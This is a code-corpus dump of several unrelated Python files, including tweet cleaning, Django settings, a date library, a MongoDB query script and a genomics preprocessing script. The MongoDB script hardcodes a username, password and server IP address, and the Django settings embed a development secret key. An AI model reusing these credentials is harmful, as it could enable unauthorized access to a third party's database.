blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fba5b1edc643035c2449182821d32651f04b2fec | ee9aad70746059af6700ec4412a33b9b7664439f | /OrganizedExample/Data/cleanQueryTweetsFormatted.py | 31b0b0e7705109611eb4dd6a6197dfe43de17e10 | [] | no_license | GeethikaRao/twitter-data-analytics | eff78315e028812fa166b54f041582059aaba5ae | 1566f7ea95e4834b68ab9fee2e894165633f612d | refs/heads/master | 2021-06-21T13:45:07.880606 | 2017-08-14T21:23:19 | 2017-08-14T21:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,898 | py | '''
Nathaniel Gottschalt, Reena Sharma, Garikapati Geethika
Data Mining 431 Project
'''
#Taking raw tweets and clean
import json
import HTMLParser
import string
data = []
with open('queryTweetsRaw.txt') as f:
for line in f:
data.append(json.loads(line))
superlist = []
result = []
#stop words
stopwords = ["rt"]
stopWordsListEdit = []
for value in data:
querywords = value.split()
resultwords = [word for word in querywords if word.lower() not in stopwords]
stopWordsListEdit.append(' '.join(resultwords))
#main cleaning
cleanedWords = []
toBeMoved = []
website = "https"
userNameRemoved = []
APPOSTOPHES = {"'s" : "is", "'re" : "are", "I'm": "I am", "'ll" : "will", "'t" : "not", "'ve " : "have"}
html_parser = HTMLParser.HTMLParser()
for words in stopWordsListEdit:
toBeMoved = []
tweet = html_parser.unescape(words)
tweet = tweet.encode('ascii', 'ignore').decode('ascii')
words = tweet.split()
for word in words:
if word[0:1] != '@':
flag = 0
word = str(word)
for c in string.punctuation:
word = word.replace(c,"")
if website not in word:
for key, value in APPOSTOPHES.iteritems():
if key in word:
if (key == "'t"):
if(word[0:word.find(key)].lower() == "can"):
toBeMoved.append(word[0:word.find(key)])
toBeMoved.append(value)
else:
toBeMoved.append(word[0:word.find(key) - 1])
toBeMoved.append(value)
else:
toBeMoved.append(word[0:word.find(key)])
toBeMoved.append(value)
flag = 1
if(flag == 0):
toBeMoved.append(word)
if(len(toBeMoved) != 0):
userNameRemoved.append(' '.join(toBeMoved))
#remove duplicates
output = []
seen = set()
for value in userNameRemoved:
if value not in seen:
output.append(value)
seen.add(value)
f = open('queryTweetsCleaned.txt', 'w')
for i in range(0, len(output)):
f.write(json.dumps([i + 1, output[i]]) + "\n")
f.close() | [
"[email protected]"
] | |
e72f967c4e0f7d6ff29d147aa687c0c58ba0e8dc | 0d1869abcb1730e3ba0f68078dfbfca37a74d6d6 | /contact_form_mail/settings.py | 3a327f9e0803f53f76e89d0dc22ff1fb8535215a | [] | no_license | michealnaita/contact_form_mail | 5193214d8c011ebf116def79bc65fa6a707aad78 | 3f760ae4969407ce54bf6ea7b3a4cd0597728166 | refs/heads/main | 2023-07-08T04:50:40.458703 | 2021-08-16T09:57:05 | 2021-08-16T09:57:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,272 | py | """
Django settings for contact_form_mail project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-5kplc5-vrburn*c1&^i^#b7!v+(wug@k0j0=d-g$74(#fh6k*f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'contact_form_mail.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'contact_form_mail.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
ae2ae2af70bccd86615425e49b28a242180a53e5 | 95fd5e70b04c76d0acafcab36e2363db5d26ac70 | /when.py | d0bed43cb75aded57e276698c521622b2ca508b2 | [] | no_license | xiocode/xio | 17a87c13b6f4ffc08920696720062bac9d792b52 | a7ffb918fb31224133004f421eb839f43622c4d5 | refs/heads/master | 2021-01-21T22:26:15.497643 | 2013-05-29T17:59:54 | 2013-05-29T17:59:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,357 | py | # -*- coding: utf-8 -*-
""" Friendly Dates and Times """
# Disable pylint's invalid name warning. 'tz' is used in a few places and it
# should be the only thing causing pylint to include the warning.
# pylint: disable-msg=C0103
import calendar
import datetime
import locale
import os
import pytz
import random
import time
# Some functions may take a parameter to designate a return value in UTC
# instead of local time. This will be used to force them to return UTC
# regardless of the paramter's value.
_FORCE_UTC = False
class _FormatsMetaClass(type):
"""Allows the formats class to be treated as an iterable.
It is important to understand has this class works.
``hasattr(formats, 'DATE')`` is true. ``'DATE' in formats` is false.
``hasattr(formats, 'D_FMT')`` is false. ``'D_FMT' in formats` is true.
This is made possible through the ``__contains__`` and ``__getitem__``
methods. ``__getitem__`` checks for the name of the attribute within
the ``formats`` class. ``__contains__``, on the other hand, checks for
the specified value assigned to an attribute of the class.
pass
"""
DATE = 'D_FMT'
DATETIME = 'D_T_FMT'
TIME = 'T_FMT'
TIME_AMPM = 'T_FMT_AMPM'
def __contains__(self, value):
index = 0
for attr in dir(_FormatsMetaClass):
if not attr.startswith('__') and attr != 'mro' and\
getattr(_FormatsMetaClass, attr) == value:
index = attr
break
return index
def __getitem__(self, attr):
return getattr(_FormatsMetaClass, attr)
def __iter__(self):
for attr in dir(_FormatsMetaClass):
if not attr.startswith('__') and attr != 'mro':
yield attr
formats = _FormatsMetaClass('formats', (object,), {})
formats.__doc__ = """A set of predefined datetime formats.
.. versionadded:: 0.3.0
"""
def _add_time(value, years=0, months=0, weeks=0, days=0,
hours=0, minutes=0, seconds=0, milliseconds=0, microseconds=0):
assert _is_date_type(value)
# If any of the standard timedelta values are used, use timedelta for them.
if seconds or minutes or hours or days or weeks:
delta = datetime.timedelta(weeks=weeks, days=days, hours=hours,
minutes=minutes, seconds=seconds,
milliseconds=milliseconds,
microseconds=microseconds)
value += delta
# Months are tricky. If the current month plus the requested number of
# months is greater than 12 (or less than 1), we'll get a ValueError. After
# figuring out the number of years and months from the number of months,
# shift the values so that we get a valid month.
if months:
more_years, months = divmod(months, 12)
years += more_years
if not (1 <= months + value.month <= 12):
more_years, months = divmod(months + value.month, 12)
months -= value.month
years += more_years
if months or years:
year = value.year + years
month = value.month + months
# When converting from a day in amonth that doesn't exist in the
# ending month, a ValueError will be raised. What follows is an ugly,
# ugly hack to get around this.
try:
value = value.replace(year=year, month=month)
except ValueError:
# When the day in the origin month isn't in the destination month,
# the total number of days in the destination month is needed.
# calendar.mdays would be a nice way to do this except it doesn't
# account_authorize for leap years at all; February always has 28 days.
_, destination_days = calendar.monthrange(year, month)
# I am reluctantly writing this comment as I fear putting the
# craziness of the hack into writing, but I don't want to forget
# what I was doing here so I can fix it later.
#
# The new day will either be 1, 2, or 3. It will be determined by
# the difference in days between the day value of the datetime
# being altered and the number of days in the destination month.
# After that, month needs to be incremented. If that puts the new
# date into January (the value will be 13), year will also need to
# be incremented (with month being switched to 1).
#
# Once all of that has been figured out, a simple replace will do
# the trick.
day = value.day - destination_days
month += 1
if month > 12:
month = 1
year += 1
value = value.replace(year=year, month=month, day=day)
return value
def _is_date_type(value):
# Acceptible types must be or extend:
# datetime.date
# datetime.time
return isinstance(value, (datetime.date, datetime.time))
def all_timezones():
"""Get a list of all time zones.
This is a wrapper for ``pytz.all_timezones``.
:returns: list -- all time zones.
.. versionadded:: 0.1.0
"""
return pytz.all_timezones
def all_timezones_set():
"""Get a set of all time zones.
This is a wrapper for ``pytz.all_timezones_set``.
:returns: set -- all time zones.
.. versionadded:: 0.1.0
"""
return pytz.all_timezones_set
def common_timezones():
"""Get a list of common time zones.
This is a wrapper for ``pytz.common_timezones``.
:returns: list -- common time zones.
.. versionadded:: 0.1.0
"""
return pytz.common_timezones
def common_timezones_set():
"""Get a set of common time zones.
This is a wrapper for ``pytz.common_timezones_set``.
:returns: set -- common time zones.
.. versionadded:: 0.1.0
"""
return pytz.common_timezones_set
def ever():
"""Get a random datetime.
Instead of using ``datetime.MINYEAR`` and ``datetime.MAXYEAR`` as the
bounds, the current year +/- 100 is used. The thought behind this is that
years that are too extreme will not be as useful.
:returns: datetime.datetime -- a random datetime.
.. versionadded:: 0.3.0
"""
# Get the year bounds
min_year = max(datetime.MINYEAR, today().year - 100)
max_year = min(datetime.MAXYEAR, today().year + 100)
# Get the random values
year = random.randint(min_year, max_year)
month = random.randint(1, 12)
day = random.randint(1, calendar.mdays[month])
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
microsecond = random.randint(0, 1000000)
return datetime.datetime(year=year, month=month, day=day, hour=hour,
minute=minute, second=second,
microsecond=microsecond)
def format(value, format_string):
"""Get a formatted version of a datetime.
This is a wrapper for ``strftime()``. The full list of directives that can
be used can be found at
http://docs.python.org/library/datetime.html#strftime-strptime-behavior.
Predefined formats are exposed through ``when.formats``:
.. data:: when.formats.DATE
Date in locale-based format.
.. data:: when.formats.DATETIME
Date and time in locale-based format.
.. data:: when.formats.TIME
Time in locale-based format.
.. data:: when.formats.TIME_AMPM
12-hour time in locale-based format.
:param value: A datetime object.
:type value: datetime.datetime, datetime.date, datetime.time.
:param format_string: A string specifying formatting the directives or
to use.
:type format_string: str.
:returns: str -- the formatted datetime.
:raises: AssertionError
.. versionadded:: 0.3.0
"""
assert _is_date_type(value)
# Check to see if `format_string` is a value from the `formats` class. If
# it is, obtain the real value from `locale.nl_langinfo()`.
if format_string in formats:
format_string = locale.nl_langinfo(getattr(locale, format_string))
return value.strftime(format_string)
def future(years=0, months=0, weeks=0, days=0,
hours=0, minutes=0, seconds=0, milliseconds=0, microseconds=0,
utc=False):
"""Get a datetime in the future.
``future()`` accepts the all of the parameters of ``datetime.timedelta``,
plus includes the parameters ``years`` and ``months``. ``years`` and
``months`` will add their respective units of time to the datetime.
By default ``future()`` will return the datetime in the system's local
time. If the ``utc`` parameter is set to ``True`` or ``set_utc()`` has been
called, the datetime will be based on UTC instead.
:param years: The number of years to add.
:type years: int.
:param months: The number of months to add.
:type months: int.
:param weeks: The number of weeks to add.
:type weeks: int.
:param days: The number of days to add.
:type days: int.
:param hours: The number of hours to add.
:type hours: int.
:param minutes: The number of minutes to add.
:type minutes: int.
:param seconds: The number of seconds to add.
:type seconds: int.
:param milliseconds: The number of milliseconds to add.
:type milliseconds: int.
:param microseconds: The number of microseconds to add.
:type microseconds: int.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the calculated datetime.
.. versionadded:: 0.1.0
"""
return _add_time(now(utc), years=years, months=months, weeks=weeks,
days=days, hours=hours, minutes=minutes, seconds=seconds,
milliseconds=milliseconds, microseconds=microseconds)
def how_many_leap_days(from_date, to_date):
"""Get the number of leap days between two dates
:param from_date: A datetime object. If only a year is specified, will use
January 1.
:type from_date: datetime.datetime, datetime.date
:param to_date: A datetime object.. If only a year is specified, will use
January 1.
:type to_date: datetime.datetime, datetime.date
:returns: int -- the number of leap days.
.. versionadded:: 0.3.0
"""
if isinstance(from_date, int):
from_date = datetime.date(from_date, 1, 1)
if isinstance(to_date, int):
to_date = datetime.date(to_date, 1, 1)
assert _is_date_type(from_date) and\
not isinstance(from_date, datetime.time)
assert _is_date_type(to_date) and not isinstance(to_date, datetime.time)
# Both `from_date` and `to_date` need to be of the same type. Since both
# `datetime.date` and `datetime.datetime` will pass the above assertions,
# cast any `datetime.datetime` values to `datetime.date`.
if isinstance(from_date, datetime.datetime):
from_date = from_date.date()
if isinstance(to_date, datetime.datetime):
to_date = to_date.date()
assert from_date <= to_date
number_of_leaps = calendar.leapdays(from_date.year, to_date.year)
# `calendar.leapdays()` calculates the number of leap days by using
# January 1 for the specified years. If `from_date` occurs after
# February 28 in a leap year, remove one leap day from the total. If
# `to_date` occurs after February 28 in a leap year, add one leap day to
# the total.
if calendar.isleap(from_date.year):
month, day = from_date.month, from_date.day
if month > 2 or (month == 2 and day > 28):
number_of_leaps -= 1
if calendar.isleap(to_date.year):
month, day = to_date.month, to_date.day
if month > 2 or (month == 2 and day > 28):
number_of_leaps += 1
return number_of_leaps
def is_5_oclock():
# Congratulations, you've found an easter egg!
#
# Returns a `datetime.timedelta` object representing how much time is
# remaining until 5 o'clock. If the current time is between 5pm and
# midnight, a negative value will be returned. Keep in mind, a `timedelta`
# is considered negative when the `days` attribute is negative; the values
# for `seconds` and `microseconds` will always be positive.
#
# All values will be `0` at 5 o'clock.
# Because this method deals with local time, the force UTC flag will need
# to be turned off and back on if it has been set.
force = _FORCE_UTC
if force:
unset_utc()
# A `try` is used here to ensure that the UTC flag will be restored
# even if an exception is raised when calling `now()`. This should never
# be the case, but better safe than sorry.
try:
the_datetime = now()
finally:
if force:
set_utc()
five = datetime.time(17)
return datetime.datetime.combine(the_datetime.date(), five) - the_datetime
def is_timezone_aware(value):
"""Check if a datetime is time zone aware.
`is_timezone_aware()` is the inverse of `is_timezone_naive()`.
:param value: A valid datetime object.
:type value: datetime.datetime, datetime.time
:returns: bool -- if the object is time zone aware.
.. versionadded:: 0.3.0
"""
assert hasattr(value, 'tzinfo')
return value.tzinfo is not None and\
value.tzinfo.utcoffset(value) is not None
def is_timezone_naive(value):
"""Check if a datetime is time zone naive.
`is_timezone_naive()` is the inverse of `is_timezone_aware()`.
:param value: A valid datetime object.
:type value: datetime.datetime, datetime.time
:returns: bool -- if the object is time zone naive.
.. versionadded:: 0.3.0
"""
assert hasattr(value, 'tzinfo')
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def now(utc=False):
"""Get a datetime representing the current date and time.
By default ``now()`` will return the datetime in the system's local time.
If the ``utc`` parameter is set to ``True`` or ``set_utc()`` has been
called, the datetime will be based on UTC instead.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the current datetime.
.. versionadded:: 0.1.0
"""
if _FORCE_UTC or utc:
return datetime.datetime.utcnow()
else:
return datetime.datetime.now()
def past(years=0, months=0, weeks=0, days=0,
hours=0, minutes=0, seconds=0, milliseconds=0, microseconds=0,
utc=False):
"""Get a datetime in the past.
``past()`` accepts the all of the parameters of ``datetime.timedelta``,
plus includes the parameters ``years`` and ``months``. ``years`` and
``months`` will add their respective units of time to the datetime.
By default ``past()`` will return the datetime in the system's local time.
If the ``utc`` parameter is set to ``True`` or ``set_utc()`` has been
called, the datetime will be based on UTC instead.
:param years: The number of years to subtract.
:type years: int.
:param months: The number of months to subtract.
:type months: int.
:param weeks: The number of weeks to subtract.
:type weeks: int.
:param days: The number of days to subtract.
:type days: int.
:param hours: The number of hours to subtract.
:type hours: int.
:param minutes: The number of minutes to subtract.
:type minutes: int.
:param seconds: The number of seconds to subtract.
:type seconds: int.
:param milliseconds: The number of milliseconds to subtract.
:type milliseconds: int.
:param microseconds: The number of microseconds to subtract.
:type microseconds: int.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the calculated datetime.
.. versionadded:: 0.1.0
"""
return _add_time(now(utc), years=-years, months=-months, weeks=-weeks,
days=-days, hours=-hours, minutes=-minutes,
seconds=-seconds, milliseconds=milliseconds,
microseconds=microseconds)
def set_utc():
"""Set all datetimes to UTC.
The ``utc`` parameter of other methods will be ignored, with the global
setting taking precedence.
This can be reset by calling ``unset_utc()``.
.. versionadded:: 0.1.0
"""
global _FORCE_UTC # Causes pylint W0603
_FORCE_UTC = True
def shift(value, from_tz=None, to_tz=None, utc=False):
"""Convert a datetime from one time zone to another.
``value`` will be converted from its time zone (when it is time zone aware)
or the time zone specified by ``from_tz`` (when it is time zone naive) to
the time zone specified by ``to_tz``. These values can either be strings
containing the name of the time zone (see ``pytz.all_timezones`` for a list
of all supported values) or a ``datetime.tzinfo`` object.
If no value is provided for either ``from_tz`` (when ``value`` is time zone
naive) or ``to_tz``, the current system time zone will be used. If the
``utc`` parameter is set to ``True`` or ``set_utc()`` has been called,
however, UTC will be used instead.
:param value: A datetime object.
:type value: datetime.datetime, datetime.time.
:param from_tz: The time zone to shift from.
:type from_tz: datetime.tzinfo, str.
:param to_tz: The time zone to shift to.
:type to_tz: datetime.tzinfo, str.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the calculated datetime.
:raises: AssertionError
.. versionchanged:: 0.3.0
Added AssertionError for invalid values of ``value``
"""
assert hasattr(value, 'tzinfo')
# Check for a from timezone
# If the datetime is time zone aware, its time zone should be used. If it's
# naive, from_tz must be supplied.
if is_timezone_aware(value):
from_tz = value.tzinfo
else:
if not from_tz:
if _FORCE_UTC or utc:
from_tz = pytz.UTC
else:
from_tz = timezone_object() # Use the system's time zone
else:
if not isinstance(from_tz, datetime.tzinfo):
# This will raise pytz.UnknownTimeZoneError
from_tz = pytz.timezone(from_tz)
# Check for a to timezone
if not to_tz:
if _FORCE_UTC or utc:
to_tz = pytz.UTC
else:
to_tz = timezone_object() # Use the system's time zone
else:
if not isinstance(to_tz, datetime.tzinfo):
# This will raise pytz.UnknownTimeZoneError
to_tz = pytz.timezone(to_tz)
if from_tz == to_tz:
return value
# If the datetime is time zone naive, pytz provides a convenient way to
# covert it to time zone aware. Using replace() directly on the datetime
# results in losing an hour when converting ahead.
if is_timezone_naive(value):
value = from_tz.localize(value)
return value.astimezone(to_tz).replace(tzinfo=None)
def timezone():
"""Get the name of the current system time zone.
:returns: str -- the name of the system time zone.
.. versionadded:: 0.1.0
"""
def _inner():
""" check for the time zone:
1. as an environment setting (most likely not)
2. in /etc/timezone (hopefully)
3. in /etc/localtime (last chance)
"""
tz = _timezone_from_env() # 1
if tz is not None:
return tz
tz = _timezone_from_etc_timezone() # 2
if tz is not None:
return tz
tz = _timezone_from_etc_localtime() # 3
if tz is not None:
return tz
return '{0}'.format(_inner())
def _timezone_from_env():
""" get the system time zone from os.environ """
if 'TZ' in os.environ:
try:
return pytz.timezone(os.environ['TZ'])
except pytz.UnknownTimeZoneError:
pass
return None
def _timezone_from_etc_localtime():
""" get the system time zone from /etc/loclatime """
matches = []
if os.path.exists('/etc/localtime'):
localtime = pytz.tzfile.build_tzinfo('/etc/localtime',
file('/etc/localtime'))
for tzname in pytz.all_timezones:
tz = pytz.timezone(tzname)
if dir(tz) != dir(localtime):
continue
for attr in dir(tz):
if callable(getattr(tz, attr)) or attr.startswith('__'):
continue
if attr == 'zone' or attr == '_tzinfos':
continue
if getattr(tz, attr) != getattr(localtime, attr):
break
else:
matches.append(tzname)
if matches:
return pytz.timezone(matches[0])
else:
# Causes pylint W0212
pytz._tzinfo_cache['/etc/localtime'] = localtime
return localtime
def _timezone_from_etc_timezone():
""" get the system time zone from /etc/timezone """
if os.path.exists('/etc/timezone'):
tz = file('/etc/timezone').read().strip()
try:
return pytz.timezone(tz)
except pytz.UnknownTimeZoneError:
pass
return None
def timezone_object(tz_name=None):
"""Get the current system time zone.
:param tz_name: The name of the time zone.
:type tz_name: str.
:returns: datetime.tzinfo -- the time zone, defaults to system time zone.
.. versionadded:: 0.1.0
"""
return pytz.timezone(tz_name if tz_name else timezone())
def today():
"""Get a date representing the current date.
:returns: datetime.date -- the current date.
.. versionadded:: 0.1.0
"""
return datetime.date.today()
def tomorrow():
"""Get a date representing tomorrow's date.
:returns: datetime.date -- the current date plus one day.
.. versionadded:: 0.1.0
"""
return datetime.date.today() + datetime.timedelta(days=1)
def unset_utc():
"""Set all datetimes to system time.
The ``utc`` parameter of other methods will be used.
This can be changed by calling ``set_utc()``.
.. versionadded:: 0.1.0
"""
global _FORCE_UTC # Causes pylint W0603
_FORCE_UTC = False
def yesterday():
"""Get a date representing yesterday's date.
:returns: datetime.date -- the current date minus one day.
.. versionadded:: 0.1.0
"""
return past_days(days=1)
def past_days(days=1):
"""Get a date representing yesterday's date.
:returns: datetime.date -- the current date minus one day.
.. versionadded:: 0.1.0
"""
return datetime.date.today() - datetime.timedelta(days=days)
def parse2Timestamp(instance, format='yyyy-MM-dd HH:mm:ss'):
if isinstance(instance, basestring):
return time.mktime(time.strptime(instance, format))
elif isinstance(instance, datetime.date):
return time.mktime(instance.timetuple())
def parse2Datetime(timestamp):
return datetime.datetime.fromtimestamp(timestamp=timestamp)
def is_weekend():
return datetime.date.today().weekday() in [5, 6]
def get_weekdays(timestamp):
return datetime.date.fromtimestamp(timestamp).weekday()
def date2datetime(date):
return datetime.datetime.fromordinal(date.toordinal()) | [
"[email protected]"
] | |
bdf9507226d0438b749c24b49dab098c9882c567 | f595954c8b22e2a99d18f76035f7c51fbcfd93bc | /server/engine_grs/Backup/mdbconnector.py | f103d0024cf658ae4dd645e03480b67a4dd556ca | [
"MIT"
] | permissive | Teddywonseokyoo/-GRS | eeea883bed7bf69e27c874f8c79a6ab2b9cbbf16 | 23fd7f0542d6cbfc1e39b707788a8f461c7d3249 | refs/heads/master | 2021-01-20T15:51:32.804747 | 2017-06-05T05:07:40 | 2017-06-05T05:07:40 | 90,797,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,154 | py | from pymongo import MongoClient
import pymongo
import urllib
password = urllib.quote_plus('gas1meter2iot')
client = MongoClient('mongodb://grsdatamanager:' + password + '@107.170.216.212')
print client
db = client.grsdata
cursor = db.grstasks.find({"superviser" : "" }).sort([("inputdate", pymongo.ASCENDING) ]).limit(2)
for document in cursor:
print(document)
"""
find end task is null and high task importance
"""
"""
#Greater Than
cursor = collection.find({"importance" : {"$gt": 1}})
for document in cursor:
print(document)
"""
"""
cursor = collection.find({"superviser" : "" })
for document in cursor:
print(document)
"""
"""
cursor = collection.find({"starttime" : {'$ne': 'null' } })
for document in cursor:
print(document)
"""
"""
#Less Than
cursor = collection.find({"importance" : {"$lt": 1}})
for document in cursor:
print(document)
"""
"""
#oreder by
cursor = collection.find().sort([("inputdate", pymongo.ASCENDING) ]) # pymongo.DESCENDING
for document in cursor:
print(document)
"""
# and , or {"$or": [{"cuisine": "Italian"}, {"address.zipcode": "10075"}]})
| [
"[email protected]"
] | |
abde4fa8241af25cdddd5bc2549e057ce4bb89ce | 07b08da4cc5aca9dc025b3b3d35237c273ce406e | /cognitiveSQL/Thesaurus.py | ca297a4b4e28bf89ad29064389d5949b9082a0af | [
"Apache-2.0",
"GPL-3.0-only"
] | permissive | dhmodi/medical-affair-assistant | 971d8f6c3b6eb718b4cd8b15bacfe6d5a0bc5411 | e8fe0e3053f8a7fae03b699a7694ba4ca9e8c75d | refs/heads/master | 2022-06-21T06:33:30.041259 | 2020-05-02T11:21:11 | 2020-05-02T11:21:11 | 119,974,948 | 0 | 0 | Apache-2.0 | 2020-05-02T11:21:40 | 2018-02-02T11:43:06 | Python | UTF-8 | Python | false | false | 1,408 | py | # -*- coding: utf-8 -*
import sys
import importlib
#importlib.reload(sys)
#sys.setdefaultencoding("utf-8")
import unicodedata
class Thesaurus:
def __init__(self):
self.dictionnary = {}
def add_entry(self, word, synonyms):
self.dictionnary[word] = synonyms
def add_synonym_of_a_word(self, word, synonym):
self.dictionnary[word].append(synonym)
def get_synonyms_of_a_word(self, word):
if word in self.dictionnary.keys():
return self.dictionnary[word]
def remove_accents(self, string):
nkfd_form = unicodedata.normalize('NFKD', unicode(string))
return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
def load(self, path):
with open(path) as f:
content = f.readlines()
# we jump content[0] because it is the encoding-type line : useless to parse
for line_id in range(1,len(content)):
if '(' not in content[line_id]:
line = content[line_id].split("|")
word = self.remove_accents(line[0])
synonyms = self.remove_accents(content[line_id + 1]).split("|")
synonyms.pop(0)
self.add_entry(word, synonyms)
def print_me(self):
for keys,values in self.dictionnary.items():
print(keys)
print(values)
| [
"[email protected]"
] | |
5205e0d08b31a6a0750413ca83da64652095801b | 4064264a33e342581a1fe2919df33a8ad40fd6b8 | /Aim2/Modules/UKBBpreprocess.py | b44275612baa9a0c72ea2706ce4069f6cc2e0494 | [] | no_license | ryanyxw/COVIDGenomeAnalysis | 6c6ffdafc1d627a37ec4cb230f476310335734f8 | 1538a59fb260862c8484518a6e2f8b8657860530 | refs/heads/master | 2022-12-08T21:25:18.297812 | 2020-08-20T01:24:49 | 2020-08-20T01:24:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import numpy as np
import csv, re
import pandas as pd
#Infile = 'I9_CORATHER.gwas.imputed_v3.both_sexes.txt'
def buildtxt(Target_chr, Disease_type, Directory, Infile):
Outfile = "[v2] Pos_and_Pvalue_by_Chr" + str(Target_chr) + "_" + Disease_type +".txt"
open(Outfile, "w")
Output = open(Outfile, "a")
with open (Directory+"\\"+Infile, 'r') as Input:
Output.write("CHR\tPOS\tPvalue\r")
for row in Input:
Snp = re.split('\t|:|\n', row)
if Snp[0] == str(Target_chr):
#print(Snp)
Output.write(Snp[0]+'\t'+Snp[1]+'\t'+Snp[-2]+'\r')
Output.close()
print("[UKBB] ["+Disease_type+" Chr"+str(Target_chr)+"] Build preprocessed txt output success")
return Outfile
| [
"[email protected]"
] | |
2193a7c2fdf9577b030346d726ee2e285606e306 | 5097d41b760da532094a6e3e26ccfb7354e0972c | /learming_logs_app/migrations/0003_topic_owner.py | af7eb2e14225b33d116d19b7fd47aeb2f5404502 | [] | no_license | mnoskovv/learning-log | 8a2cf07fb3afc4974d626df8d3de4a41645c3f71 | eb16342b5b17ccd23a8da008b758592021b17e73 | refs/heads/master | 2023-08-03T07:40:00.658526 | 2020-04-09T13:08:01 | 2020-04-09T13:08:01 | 235,308,668 | 0 | 0 | null | 2021-09-22T18:47:11 | 2020-01-21T09:49:23 | Python | UTF-8 | Python | false | false | 619 | py | # Generated by Django 3.0.2 on 2020-03-22 09:08
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('learming_logs_app', '0002_entry'),
]
operations = [
migrations.AddField(
model_name='topic',
name='owner',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
| [
"[email protected]"
] | |
a233d4e8b9afc6d98a3d8ee9809d4b0450623742 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /Ff84aGq6e7gjKYh8H_6.py | 44234b3c35513f59dda8ddfcdac696049dd11660 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py |
def minutes_to_seconds(time):
if int(time[-2:]) >= 60:
return False
else:
return int(time[:time.index(':')]) * 60 + int(time[-2:])
| [
"[email protected]"
] | |
